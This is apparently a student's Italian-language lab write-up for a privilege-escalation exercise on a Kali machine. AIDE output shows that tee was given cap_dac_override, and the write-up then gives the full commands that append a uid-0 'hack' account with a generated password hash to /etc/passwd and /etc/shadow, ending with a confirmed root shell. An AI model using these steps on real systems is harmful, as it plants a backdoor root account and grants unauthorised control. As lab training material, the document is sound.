##

usate come utente kali senza sudo il file (o i file) modificato dal comando change4 che ritenete utili per inserire nei file in /etc/passwd ed /etc/shadow le righe opportune per "creare" un utente di nome hack con privilegi di root e password hack 

##

-------

1) configuro come da manuale AIDE

2) lancio AIDE dopo aver eseguito il file change4

---------------------------------------------------
Detailed information about changes:
---------------------------------------------------

File: /etc/sudoers
 Ctime     : 2024-03-16 09:09:16 -0400        | 2024-06-12 08:50:53 -0400

File: /usr/bin/grep
 Ctime     : 2024-02-25 12:39:53 -0500        | 2024-06-12 08:50:53 -0400
 XAttrs    : num=0                            | num=1
                                              | [1] security.capability <=> AAAA
                                              | AgAAAAAAAAAAAAAAAAAAAAA=

File: /usr/bin/tee
 Ctime     : 2024-02-25 12:39:58 -0500        | 2024-06-12 08:50:53 -0400
 XAttrs    : num=0                            | num=1
                                              | [1] security.capability <=> AQAA
                                              | AgIAAAAAAAAAAAAAAAAAAAA=

File: /usr/bin/vim.tiny
 Perm      : -rwxr-xr-x                       | -r-xr-xr-x
 Ctime     : 2024-02-25 12:39:58 -0500        | 2024-06-12 08:50:53 -0400
 ACL       : A: user::rwx                     | A: user::r-x
             A: group::r-x                    | A: group::r-x
             A: other::r-x                    | A: other::r-x

-------------------------------------------------

Cambiamenti:
/etc/sudoers 	->	timestamp
/grep		->	timestamp, capabilities
/tee		->	timestamp, capabilities
/vim		->	timestamp, permessi

---------

Vim:
	U non ha più il permesso di scrittura

Grep:
	getcap /usr/bin/grep
	/usr/bin/grep =

Tee:
	getcap /usr/bin/tee 
	/usr/bin/tee cap_dac_override=ep

 	man capabilities
	/CAP_DAC_OVERRIDE
	Bypass  file  read, write, and execute permission checks.

-----

3) cerco di capire come sfruttare i cambiamenti

-#	man tee
	tee - read from standard input and write to standard output
	-a, --append
              append to the given FILEs, do not overwrite

4) UTENTE hack , dovrò agire su /passwd e /shadow 

- in /etc/passwd : 
	
	hack:x:0:0:hack:/root:/usr/bin/bash
	
- in /etc/shadow :

-#	openssl rand -base64 32
	AC+T70A6F0V/ICo+jZWaLave0WRWMr+bQ034ZLMN95g=

-#	openssl passwd -6 -salt AC+T70A6F0V/ICo+jZWaLave0WRWMr+bQ034ZLMN95g= hack  
	$6$AC+T70A6F0V/ICo+$jS1cheHFsbVUKazhg6eiWdFUb.imylfK4whwAJ20HH9guTtWNaBSPLFvOYdyRhXG0qEKGaXBe.O0FBYYxb9Hu/

	hack:$6$AC+T70A6F0V/ICo+$jS1cheHFsbVUKazhg6eiWdFUb.imylfK4whwAJ20HH9guTtWNaBSPLFvOYdyRhXG0qEKGaXBe.O0FBYYxb9Hu/:19778:0:99999:7:::
		
5) inietto:

-# 	echo "hack:x:0:0:hack:/root:/usr/bin/zsh" | tee -a /etc/passwd

-#	echo "hack:\$6\$AC+T70A6F0V/ICo+\$jS1cheHFsbVUKazhg6eiWdFUb.imylfK4whwAJ20HH9guTtWNaBSPLFvOYdyRhXG0qEKGaXBe.O0FBYYxb9Hu/:19778:0:99999:7:::" | tee -a /etc/shadow

#IMPORTANTE# Nota: usa \ prima di $ 

6) verifico, divento hack e lancio id:

-#	su hack
		root@kali:/home/kali# id
		uid=0(root) gid=0(root) groups=0(root)





